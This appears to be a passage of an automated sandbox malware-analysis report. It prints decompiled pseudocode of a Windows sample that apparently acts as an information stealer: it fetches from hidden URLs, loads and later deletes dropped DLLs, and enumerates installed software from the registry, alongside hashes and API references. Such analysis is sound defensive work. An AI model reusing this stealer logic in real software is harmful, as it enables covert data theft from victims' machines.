mpiW$lstrcpyA$lstrcpynA$lstrlenA$lstrlenW$wsprintfW
API String ID: 2238633743-713005165
Opcode ID: e028293d92a6d1446fa316ab8758502f4985f86e5f7caba5ca57395c6088599a
Instruction ID: 478e95b91b71f65d022eb20dd3102177344006f4c0d5f92c9651a9cba786d8dc
Opcode Fuzzy Hash: e028293d92a6d1446fa316ab8758502f4985f86e5f7caba5ca57395c6088599a
Instruction Fuzzy Hash: 99125671645220EFD340DFBAEFC1E6937E8AB497003105D36B624F72A1D7B899218B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040776F Relevance: 77.4, APIs: 34, Strings: 10, Instructions: 395
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			_entry_() {
				WCHAR* _v8;
				void* _v12;
				void* _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				char _v32;
				struct HINSTANCE__* _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v236;
				void* _t68;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				char _t77;
				char _t78;
				WCHAR* _t79;
				WCHAR* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t85;
				void* _t87;
				signed int _t95;
				void* _t99;
				void* _t100;
				void* _t113;
				void* _t117;
				void* _t119;
				void* _t123;
				void* _t124;
				void* _t125;
				WCHAR* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				struct HINSTANCE__* _t140;
				struct HINSTANCE__* _t142;
				struct HINSTANCE__* _t156;
				struct HINSTANCE__* _t159;
				void* _t166;
				void* _t181;
				void* _t182;
				char* _t184;
				intOrPtr _t236;
				intOrPtr _t238;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				intOrPtr _t246;
				intOrPtr _t247;
				void* _t258;
				void* _t259;
				WCHAR* _t260;
				void* _t263;
				void* _t264;
				signed int _t265;
				void* _t268;
				struct HINSTANCE__* _t269;
				void* _t271;
				void* _t272;
				void* _t273;
				intOrPtr* _t276;
				void* _t277;
				intOrPtr* _t278;

				E0040100B(); // executed
				 *0x40e064(0); // executed
				_v24 = E0040A4C2("76426c3f362f5a47a469f0e9d8bc3eef");
				E00404027();
				_t184 =  *0x40e04c;
				_t68 =  *_t184( &_v236, 0x55); // executed
				if(_t68 == 0) {
					L4:
					_t260 = L"iqroq5112542785672901323";
					_push(_t260);
					_push(0);
					_push(0x1f0001);
					if( *((intOrPtr*)( *0x40e168))() != 0) {
						ExitProcess(2); // executed
					}
					CreateMutexW(0, 0, _t260); // executed
					_t71 = E0040A0BE(); // executed
					if(_t71 != 0) {
						E0040A1FE();
					}
					_t72 = E00409FD3(0x40d998);
					_t73 = E00409FD3("                                                                ");
					_t74 = E00409FD3("                                                                ");
					_v64 = _t72;
					_v60 = _t73;
					_v56 = _t74;
					_v52 = E00409FD3("                                                                ");
					_v48 = E00409FD3("                                                                ");
					_t77 =  *0x40e314; // 0x615778
					_v32 = _t77;
					_t78 =  *0x40e204; // 0x5f5980
					_v28 = 0;
					_v44 = _t78;
					_v40 = 0;
					_t79 = E00408619( &_v32);
					 *_t278 = 0x1000;
					_v8 = _t79;
					_t80 =  *((intOrPtr*)( *0x40e044))(0x40, _t184);
					_v20 = _t80;
					_t81 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
					_t82 = E0040A5FA(); // executed
					_t258 = _t82; // executed
					_t83 = E0040A672( *0x40e044); // executed
					_t181 = _t83;
					_t85 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t81,  *0x40e348), _t258);
					_t236 =  *0x40e20c; // 0x5f5700
					_t87 = E0040A503(E0040A503(_t85, _t236), _t181);
					_t238 =  *0x40e308; // 0x615fa0
					_t263 = E0040A503(E0040A503(_t87, _t238), _v24);
					_v16 =  *((intOrPtr*)( *0x40e13c))(_v20, _t263);
					LocalFree(_t258);
					LocalFree(_t181);
					LocalFree(_t263);
					_t182 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
					_t95 = 0;
					_v12 = 0;
					while(1) {
						_t264 = E0040A4C2( *((intOrPtr*)(_t277 + _t95 * 4 - 0x3c)));
						_push(_t264);
						if( *((short*)(_t264 +  *((intOrPtr*)( *0x40e08c))() * 2 - 2)) != 0x2f) {
							_t264 = E0040A503(_t264, "/");
						}
						_t99 = E00407C62(_t264, _v16, _v8,  &_v44); // executed
						_t278 = _t278 + 0xc;
						_t259 = _t99;
						_t100 =  *((intOrPtr*)( *0x40e08c))(_t259);
						_push(_t264);
						if(_t100 >= 0x40) {
							break;
						}
						LocalFree();
						if(_t259 == 0) {
							LocalFree(_t259);
						}
						_t95 = _v12 + 1;
						_v12 = _t95;
						if(_t95 < 5) {
							continue;
						} else {
							L18:
							LocalFree(_v8);
							LocalFree(_v16);
							_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							E0040A24A( &_v8);
							if(_t259 == 0) {
								L38:
								LocalFree(_v8);
								LocalFree(_t182);
								ExitProcess(0);
							}
							E0040864C(_t259, _v8); // executed
							_t265 = 0;
							_t113 =  *((intOrPtr*)( *0x40e18c))(_t259,  *0x40e418);
							if(_t113 == 0) {
								L21:
								ExitProcess(0xffffffff);
							}
							_t265 = _t113 - _t259 >> 1;
							_v12 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100);
							_t117 =  *((intOrPtr*)( *0x40e08c))(_t259);
							_t37 = _t265 + 6; // 0x6
							_t119 = E0040A3E4(_t259,  &_v12, _t37, _t117); // executed
							if(_t119 != 0) {
								_t182 = E0040A503(_t182, _v12);
								LocalFree(_v12);
								_t123 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t124 =  *((intOrPtr*)( *0x40e13c))(_t123, _v8);
								_t243 =  *0x40e258; // 0x5f5740
								_t125 = E0040A503(_t124, _t243);
								_t244 =  *0x40e370; // 0x60e448
								_t126 = E0040A503(_t125, _t244);
								_v20 = _t126;
								_t127 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t128 =  *((intOrPtr*)( *0x40e13c))(_t127, _v8);
								_t245 =  *0x40e258; // 0x5f5740
								_t129 = E0040A503(_t128, _t245);
								_t246 =  *0x40e454; // 0x616000
								_v24 = E0040A503(_t129, _t246);
								SetCurrentDirectoryW(_v8); // executed
								GetEnvironmentVariableW( *0x40e2e0,  *((intOrPtr*)( *0x40e044))(0x40, 0x5000), 0x2800);
								_t247 =  *0x40e1e8; // 0x5f5860
								_t220 = E0040A503(_t132, _t247);
								_t268 = E0040A503(_t134, _v8);
								SetEnvironmentVariableW( *0x40e2e0, _t268);
								LocalFree(_t268);
								E00409906(_t259, _t182); // executed
								_t140 = LoadLibraryW(_v24); // executed
								_v28 = _t140;
								if(_t140 != 0) {
									E00403F9D(_t220, _t140, _t259, _t182); // executed
								}
								_t142 = LoadLibraryW(_v20); // executed
								_t269 = _t142;
								_v36 = _t269;
								if(_t269 != 0) {
									_t166 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
									_v16 = _t166;
									 *0x40e0c4(0, _t166, 0x1a, 0);
									if(E004065D8(_t269) == 0) {
										_t273 = _v16;
									} else {
										_t273 = _v16;
										E0040633E(_t273, _t182, _t269, 0); // executed
									}
									LocalFree(_t273);
								}
								E0040A7DA(_t182); // executed
								E0040ABD8(_t259, _t182); // executed
								E004055B6(_t182); // executed
								E00409BD9(_t259, _t182); // executed
								E00404F7E(_t259, _t182);
								_v12 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t259) + _t149);
								if(E00408A42(_t259,  &_v12) > 0) {
									E00408ADD(_v12, _t182); // executed
								}
								LocalFree(_v12); // executed
								E004073C7();
								_t156 = _v36;
								if(_t156 != 0) {
									FreeLibrary(_t156); // executed
								}
								_t271 = _v20;
								DeleteFileW(_t271); // executed
								LocalFree(_t271);
								_t159 = _v28;
								if(_t159 != 0) {
									FreeLibrary(_t159); // executed
								}
								_t272 = _v24;
								DeleteFileW(_t272); // executed
								LocalFree(_t272);
								LocalFree(_t259);
								goto L38;
							} else {
								ExitProcess(0xfffffffe);
							}
							goto L21;
						}
					}
					_t182 =  *((intOrPtr*)( *0x40e13c))(_t182);
					LocalFree(_t264);
					goto L18;
				}
				_t276 = 0x40e4d8;
				while(1) {
					_push( *_t276);
					_t184 =  &_v236;
					_push(_t184);
					if( *((intOrPtr*)( *0x40e170))() != 0) {
						goto L4;
					}
					_t276 = _t276 + 4;
					if(_t276 != 0x40e4dc) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x0040777b
0x00407783
0x00407793
0x00407796
0x0040779b
0x004077aa
0x004077ae
0x004077d4
0x004077d9
0x004077de
0x004077df
0x004077e0
0x004077e9
0x004077f8
0x004077f8
0x004077ee
0x004077fe
0x00407805
0x00407807
0x00407807
0x00407812
0x0040781e
0x0040782a
0x00407834
0x00407837
0x0040783a
0x00407847
0x0040784f
0x00407855
0x0040785a
0x0040785d
0x00407862
0x00407865
0x00407868
0x0040786b
0x00407876
0x0040787f
0x00407882
0x00407891
0x00407894
0x00407898
0x0040789d
0x0040789f
0x004078b0
0x004078b9
0x004078be
0x004078cf
0x004078d4
0x004078f1
0x004078fa
0x004078fd
0x00407904
0x0040790b
0x00407920
0x00407922
0x00407924
0x00407927
0x00407936
0x00407938
0x00407941
0x0040794f
0x0040794f
0x0040795d
0x00407968
0x0040796b
0x0040796e
0x00407970
0x00407974
0x00000000
0x00000000
0x00407976
0x0040797e
0x00407981
0x00407981
0x0040798a
0x0040798b
0x00407991
0x00000000
0x00407993
0x004079a6
0x004079a9
0x004079b2
0x004079c9
0x004079cc
0x004079d3
0x00407c45
0x00407c48
0x00407c4f
0x00407c57
0x00407c57
0x004079de
0x004079ee
0x004079f1
0x004079f5
0x004079ff
0x00407a01
0x00407a01
0x004079fb
0x00407a15
0x00407a1e
0x00407a21
0x00407a2a
0x00407a33
0x00407a4a
0x00407a4c
0x00407a5f
0x00407a6b
0x00407a6d
0x00407a75
0x00407a7a
0x00407a82
0x00407a90
0x00407a93
0x00407a9f
0x00407aa1
0x00407aa9
0x00407aae
0x00407abe
0x00407ac1
0x00407ae4
0x00407aea
0x00407afa
0x00407b01
0x00407b0a
0x00407b11
0x00407b19
0x00407b26
0x00407b28
0x00407b2d
0x00407b33
0x00407b39
0x00407b42
0x00407b44
0x00407b46
0x00407b4b
0x00407b5a
0x00407b63
0x00407b66
0x00407b75
0x00407b8a
0x00407b77
0x00407b7a
0x00407b81
0x00407b87
0x00407b8e
0x00407b8e
0x00407b98
0x00407ba1
0x00407baa
0x00407bb3
0x00407bbc
0x00407bd6
0x00407be5
0x00407beb
0x00407beb
0x00407bf3
0x00407bfb
0x00407c00
0x00407c05
0x00407c08
0x00407c08
0x00407c0e
0x00407c12
0x00407c19
0x00407c1f
0x00407c24
0x00407c27
0x00407c27
0x00407c2d
0x00407c31
0x00407c38
0x00407c3f
0x00000000
0x00407a35
0x00407a37
0x00407a37
0x00000000
0x00407a33
0x00407991
0x0040799e
0x004079a0
0x00000000
0x004079a0
0x004077b0
0x004077b5
0x004077b5
0x004077bc
0x004077c2
0x004077c7
0x00000000
0x00000000
0x004077c9
0x004077d2
0x00000000
0x00000000
0x00000000
0x004077d2
0x00000000

APIs

Part of subcall function 0040100B: LoadLibraryW.KERNEL32(kernel32.dll,?,?,00407780), ref: 00401016
Part of subcall function 0040100B: GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 00401036
Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,?,00407780), ref: 00401042
Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Ole32.dll,?,?,?,?,?,00407780), ref: 00401051
Part of subcall function 0040100B: LoadLibraryW.KERNEL32(WinInet.dll,?,?,?,?,?,00407780), ref: 00401061
Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Crypt32.dll,?,?,?,?,?,00407780), ref: 00401091
Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Shell32.dll,?,?,?,?,?,00407780), ref: 004010A1
Part of subcall function 0040100B: LoadLibraryW.KERNEL32(Bcrypt.dll,?,?,?,?,?,00407780), ref: 004010AA
Part of subcall function 0040100B: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 004010B8

CoInitialize.OLE32(00000000), ref: 00407783

Part of subcall function 0040A4C2: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
Part of subcall function 0040A4C2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,76426c3f362f5a47a469f0e9d8bc3eef,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1

CreateMutexW.KERNEL32(00000000,00000000,iqroq5112542785672901323), ref: 004077EE
ExitProcess.KERNEL32 ref: 004077F8
LocalFree.KERNEL32(00000000), ref: 004078FD
LocalFree.KERNEL32(00000000), ref: 00407904
LocalFree.KERNEL32(00000000), ref: 0040790B
LocalFree.KERNEL32(00000000), ref: 00407976
LocalFree.KERNEL32(00000000), ref: 00407981
LocalFree.KERNEL32(00000000), ref: 004079A0
LocalFree.KERNEL32(?), ref: 004079A9
LocalFree.KERNEL32(?), ref: 004079B2
ExitProcess.KERNEL32 ref: 00407A01
ExitProcess.KERNEL32 ref: 00407A37

Strings

, xrefs: 00407817
, xrefs: 00407823
iqroq5112542785672901323, xrefs: 004077D9, 004077DE, 004077EB
H`, xrefs: 00407A7A
76426c3f362f5a47a469f0e9d8bc3eef, xrefs: 00407789
`X_, xrefs: 00407AEA
xWa, xrefs: 00407855
@W_, xrefs: 00407A6D, 00407AA1
, xrefs: 00407842
, xrefs: 0040782F

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$LibraryLoad$ExitProcess$AddressProc$AllocByteCharCreateInitializeMultiMutexWide
String ID: $ $ $ $76426c3f362f5a47a469f0e9d8bc3eef$@W_$H`$`X_$iqroq5112542785672901323$xWa
API String ID: 1492179042-1493457711
Opcode ID: d884b9c4737cff88c14df9b88ae15d5e0a2d8634bf9add78216dd2a405e61c2a
Instruction ID: e92a4b87a1a530e7256a75f8bb231f7b298302859da8ec0d9ad369049daf7dae
Opcode Fuzzy Hash: d884b9c4737cff88c14df9b88ae15d5e0a2d8634bf9add78216dd2a405e61c2a
Instruction Fuzzy Hash: 25D18571E00214ABDB04ABB6DE49E6E77B5AF48310B10483AF905B73D1DF78AD118B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00409581 Relevance: 61.6, APIs: 30, Strings: 5, Instructions: 309
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00409581(void* __eflags, intOrPtr* _a4, void* _a8) {
				void* _v8;
				char* _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				long _t81;
				long _t85;
				long _t89;
				long _t95;
				long _t98;
				long _t105;
				void* _t112;
				long _t115;
				intOrPtr _t121;
				long _t127;
				long _t134;
				long _t144;
				intOrPtr* _t157;
				int _t158;
				int _t159;
				void* _t160;
				void* _t161;
				void* _t191;
				void* _t193;
				void* _t194;
				void* _t195;
				int* _t196;
				void* _t198;

				_t157 = _a4;
				_t196 = 0;
				_v16 = 0xf003f;
				_v8 = 0;
				 *_t157 = E0040A503( *_t157, _a8);
				_t81 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20119,  &_v8); // executed
				if(_t81 == 0) {
					_t158 = 0;
					_v28 = 0;
					do {
						_v32 = 0x800;
						_t191 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000);
						_v36 = _t191;
						_t85 = RegEnumKeyExW(_v8, _t158, _t191,  &_v32, _t196, _t196, _t196, _t196); // executed
						_v40 = _t85;
						if(_t85 != 0) {
							L15:
							LocalFree(_t191);
							goto L16;
						}
						_a8 = _t196;
						_t127 = RegOpenKeyExW(_v8, _t191, _t196, 0x20119,  &_a8); // executed
						if(_t127 == 0) {
							_v24 = 0x1000;
							_v20 = 0x1000;
							_t161 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
							_v12 =  *((intOrPtr*)( *0x40e044))(0x40, _v20 + _v20);
							_t134 = RegQueryValueExW(_a8, L"DisplayName", _t196,  &_v16, _t161,  &_v24); // executed
							if(_t134 != 0) {
								L14:
								LocalFree(_v12);
								LocalFree(_t161);
								RegCloseKey(_a8); // executed
								_t158 = _v28;
								goto L15;
							}
							_t195 =  *((intOrPtr*)( *0x40e044))(0x40, _v20 + _v24 + _v20 + _v24);
							_t144 = RegQueryValueExW(_a8, L"DisplayVersion", _t196,  &_v16, _v12,  &_v20); // executed
							if(_t144 != 0) {
								L10:
								_push(_t196);
								L11:
								_push(_t161);
								wsprintfW(_t195, L"\t%s %s\n");
								_t198 = _t198 + 0x10;
								_push(_t195);
								_push( *_a4);
								if( *((intOrPtr*)( *0x40e18c))() == 0) {
									 *_a4 = E0040A503( *_a4, _t195);
								}
								LocalFree(_t195);
								_t191 = _v36;
								goto L14;
							}
							_push(_v12);
							_push(_t161);
							if( *((intOrPtr*)( *0x40e18c))() != 0) {
								goto L10;
							}
							_push(_v12);
							goto L11;
						}
						LocalFree(_t191);
						RegCloseKey(_a8);
						L16:
						_t158 = _t158 + 1;
						_v28 = _t158;
					} while (_v40 == _t196);
					RegCloseKey(_v8);
					_v8 = _t196;
					_t89 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", _t196, 0x20019,  &_v8); // executed
					if(_t89 != 0) {
						L34:
						RegCloseKey(_v8);
						return _t196;
					}
					_t159 = _t196;
					_v24 = _t196;
					do {
						_v40 = 0x800;
						_t193 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000);
						_v36 = _t193;
						_t95 = RegEnumKeyExW(_v8, _t159, _t193,  &_v40, _t196, _t196, _t196, _t196); // executed
						_v32 = _t95;
						if(_t95 != 0) {
							L31:
							LocalFree(_t193);
							goto L32;
						}
						_a8 = _t196;
						_t98 = RegOpenKeyExW(_v8, _t193, _t196, 0x20019,  &_a8); // executed
						if(_t98 == 0) {
							_v28 = 0x1000;
							_v20 = 0x1000;
							_t160 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
							_v12 =  *((intOrPtr*)( *0x40e044))(0x40, _v20 + _v20);
							_t105 = RegQueryValueExW(_a8, L"DisplayName", _t196,  &_v16, _t160,  &_v28); // executed
							if(_t105 != 0) {
								L30:
								LocalFree(_v12);
								LocalFree(_t160);
								RegCloseKey(_a8); // executed
								_t159 = _v24;
								goto L31;
							}
							_t112 = LocalAlloc(0x40, _v20 + _v28 + _v20 + _v28); // executed
							_t194 = _t112;
							_t115 = RegQueryValueExW(_a8, L"DisplayVersion", _t196,  &_v16, _v12,  &_v20); // executed
							if(_t115 != 0) {
								L26:
								_push(_t196);
								L27:
								_push(_t160);
								wsprintfW(_t194, L"\t%s %s\n");
								_t198 = _t198 + 0x10;
								_push(_t194);
								_push( *_a4);
								if( *((intOrPtr*)( *0x40e18c))() == 0) {
									_t121 = E0040A503( *_a4, _t194); // executed
									 *_a4 = _t121;
								}
								LocalFree(_t194);
								_t193 = _v36;
								goto L30;
							}
							_push(_v12);
							_push(_t160);
							if( *((intOrPtr*)( *0x40e18c))() != 0) {
								goto L26;
							}
							_push(_v12);
							goto L27;
						}
						LocalFree(_t193);
						RegCloseKey(_a8);
						L32:
						_t159 = _t159 + 1;
						_v24 = _t159;
					} while (_v32 == _t196);
					_t196 = 1;
					goto L34;
				}
				RegCloseKey(_v8);
				return 0;
			}

0x0040958b
0x0040958f
0x00409591
0x00409598
0x004095a5
0x004095bd
0x004095c1
0x004095d3
0x004095d5
0x004095d9
0x004095e5
0x004095f4
0x004095fd
0x00409606
0x00409608
0x0040960d
0x00409737
0x00409738
0x00000000
0x00409738
0x00409627
0x0040962a
0x0040962e
0x0040964f
0x00409652
0x00409661
0x00409676
0x0040968b
0x0040968f
0x0040971b
0x0040971e
0x00409725
0x0040972e
0x00409734
0x00000000
0x00409734
0x004096ae
0x004096c4
0x004096c8
0x004096de
0x004096de
0x004096df
0x004096df
0x004096e6
0x004096ef
0x004096f7
0x004096f8
0x004096fe
0x0040970f
0x0040970f
0x00409712
0x00409718
0x00000000
0x00409718
0x004096ca
0x004096d2
0x004096d7
0x00000000
0x00000000
0x004096d9
0x00000000
0x004096d9
0x00409631
0x0040963a
0x0040973e
0x0040973e
0x0040973f
0x00409742
0x0040974e
0x0040976d
0x00409770
0x00409774
0x004098f4
0x004098f7
0x00000000
0x004098ff
0x0040977a
0x0040977c
0x0040977f
0x0040978b
0x0040979a
0x004097a3
0x004097ac
0x004097ae
0x004097b3
0x004098dd
0x004098de
0x00000000
0x004098de
0x004097cd
0x004097d0
0x004097d4
0x004097f5
0x004097f8
0x00409807
0x0040981c
0x00409831
0x00409835
0x004098c1
0x004098c4
0x004098cb
0x004098d4
0x004098da
0x00000000
0x004098da
0x0040984c
0x00409854
0x0040986a
0x0040986e
0x00409884
0x00409884
0x00409885
0x00409885
0x0040988c
0x00409895
0x0040989d
0x0040989e
0x004098a4
0x004098ad
0x004098b5
0x004098b5
0x004098b8
0x004098be
0x00000000
0x004098be
0x00409870
0x00409878
0x0040987d
0x00000000
0x00000000
0x0040987f
0x00000000
0x0040987f
0x004097d7
0x004097e0
0x004098e4
0x004098e4
0x004098e5
0x004098e8
0x004098f3
0x00000000
0x004098f3
0x004095c6
0x00000000

APIs

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020119,00000000,74CB5850,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004095BD
RegCloseKey.ADVAPI32(00000000), ref: 004095C6
RegEnumKeyExW.KERNEL32(00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000), ref: 00409606
RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00020119,000F003F), ref: 0040962A
LocalFree.KERNEL32(00000000), ref: 00409631
RegCloseKey.ADVAPI32(000F003F), ref: 0040963A
RegCloseKey.ADVAPI32(00000000), ref: 0040974E
RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00409770
RegEnumKeyExW.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004097AC
RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00020019,000F003F), ref: 004097D0
LocalFree.KERNEL32(00000000), ref: 004097D7
RegCloseKey.ADVAPI32(000F003F), ref: 004097E0

Strings

?, xrefs: 00409591
DisplayVersion, xrefs: 004096BC, 00409862
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004095B3, 00409763
DisplayName, xrefs: 00409683, 00409829
%s %s, xrefs: 004096E0, 00409886

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: CloseOpen$FreeLocal$Enumlstrlen$AllocGlobal
String ID: %s %s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 3566135887-2725056526
Opcode ID: 73dd298284c8cc527ff371f42f59e84f1e5e797dd55f8e0ac8c723226cce84a4
Instruction ID: d80988b05da4082da03304b58d54d9122d1b9f20f569912955d0e5abbda793b7
Opcode Fuzzy Hash: 73dd298284c8cc527ff371f42f59e84f1e5e797dd55f8e0ac8c723226cce84a4
Instruction Fuzzy Hash: 60B16C71A00219BFDB05DFA6DD84EAF7BB9EF49340B104425FA05B7261D7749E10CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004055B6 Relevance: 60.5, APIs: 48, Instructions: 476
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E004055B6(short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				short* _v56;
				signed int _v60;
				char _v64;
				void* __ecx;
				void* _t117;
				void* _t124;
				void* _t131;
				void* _t138;
				void* _t147;
				void* _t156;
				void* _t162;
				void* _t167;
				void* _t181;
				void* _t194;
				void* _t195;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t226;
				void* _t228;
				void* _t229;
				void* _t230;
				char _t274;
				void* _t289;
				void* _t291;
				void* _t295;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				int _t309;
				void* _t311;
				void* _t314;
				signed int _t317;
				void* _t319;
				signed int _t321;
				void* _t323;
				signed int _t325;
				void* _t327;
				signed int _t329;
				void* _t331;
				signed int _t333;
				void* _t335;
				signed int _t337;
				void* _t339;
				signed int _t341;
				void* _t344;
				void* _t345;
				void* _t347;
				void* _t348;

				_v56 = __edx;
				_t295 =  *((intOrPtr*)( *0x40e18c))(_t230,  *0x40e250);
				if(_t295 == 0) {
					L42:
					return 0;
				}
				while(1) {
					_t296 = _t295 + 0xa;
					_t117 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t296) + _t115);
					_t226 = _t117;
					_v8 = _t226;
					_t314 =  *((intOrPtr*)( *0x40e18c))(_t296,  *0x40e1f0);
					if(_t314 == 0) {
						break;
					}
					_t317 = _t314 - _t296 >> 1;
					if(E0040A3E4(_t296,  &_v8, 0, _t317) == 0) {
						_t226 = _v8;
						break;
					}
					_t298 = _t296 + _t317 * 2 + 2;
					_t124 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t298) + _t122);
					_t226 = _t124;
					_v12 = _t226;
					_t319 =  *((intOrPtr*)( *0x40e18c))(_t298,  *0x40e20c);
					if(_t319 == 0) {
						L37:
						LocalFree(_v8);
						L29:
						break;
					}
					_t321 = _t319 - _t298 >> 1;
					if(E0040A3E4(_t298,  &_v12, 0, _t321) == 0) {
						_t226 = _v12;
						goto L37;
					}
					_t300 = _t298 + _t321 * 2 + 2;
					_t131 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t300) + _t129);
					_t226 = _t131;
					_v16 = _t226;
					_t323 =  *((intOrPtr*)( *0x40e18c))(_t300,  *0x40e20c);
					if(_t323 == 0) {
						L35:
						LocalFree(_v8);
						LocalFree(_v12);
						goto L29;
					}
					_t325 = _t323 - _t300 >> 1;
					if(E0040A3E4(_t300,  &_v16, 0, _t325) == 0) {
						_t226 = _v16;
						goto L35;
					}
					_t302 = _t300 + _t325 * 2 + 2;
					_t138 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t302) + _t136);
					_t228 = _t138;
					_v20 = _t228;
					_t327 =  *((intOrPtr*)( *0x40e18c))(_t302,  *0x40e20c);
					if(_t327 == 0) {
						L33:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_t228);
						LocalFree(_v16);
						L40:
						L41:
						goto L42;
					}
					_t329 = _t327 - _t302 >> 1;
					if(E0040A3E4(_t302,  &_v20, 0, _t329) == 0) {
						_t228 = _v20;
						goto L33;
					}
					_t304 = _t302 + _t329 * 2 + 2;
					_t147 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t304) + _t145);
					_t226 = _t147;
					_v24 = _t226;
					_t331 =  *((intOrPtr*)( *0x40e18c))(_t304,  *0x40e20c);
					if(_t331 == 0) {
						L31:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						goto L29;
					}
					_t333 = _t331 - _t304 >> 1;
					if(E0040A3E4(_t304,  &_v24, 0, _t333) == 0) {
						_t226 = _v24;
						goto L31;
					}
					_t306 = _t304 + _t333 * 2 + 2;
					_t156 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t306) + _t154);
					_t226 = _t156;
					_v32 = _t226;
					_t335 =  *((intOrPtr*)( *0x40e18c))(_t306,  *0x40e20c);
					if(_t335 == 0) {
						L28:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						LocalFree(_v24);
						goto L29;
					}
					_t337 = _t335 - _t306 >> 1;
					_t162 = E0040A3E4(_t306,  &_v32, 0, _t337);
					_t226 = _v32;
					if(_t162 == 0) {
						goto L28;
					}
					_t308 = _t306 + _t337 * 2 + 2;
					_v44 =  *_t226 & 0x0000ffff;
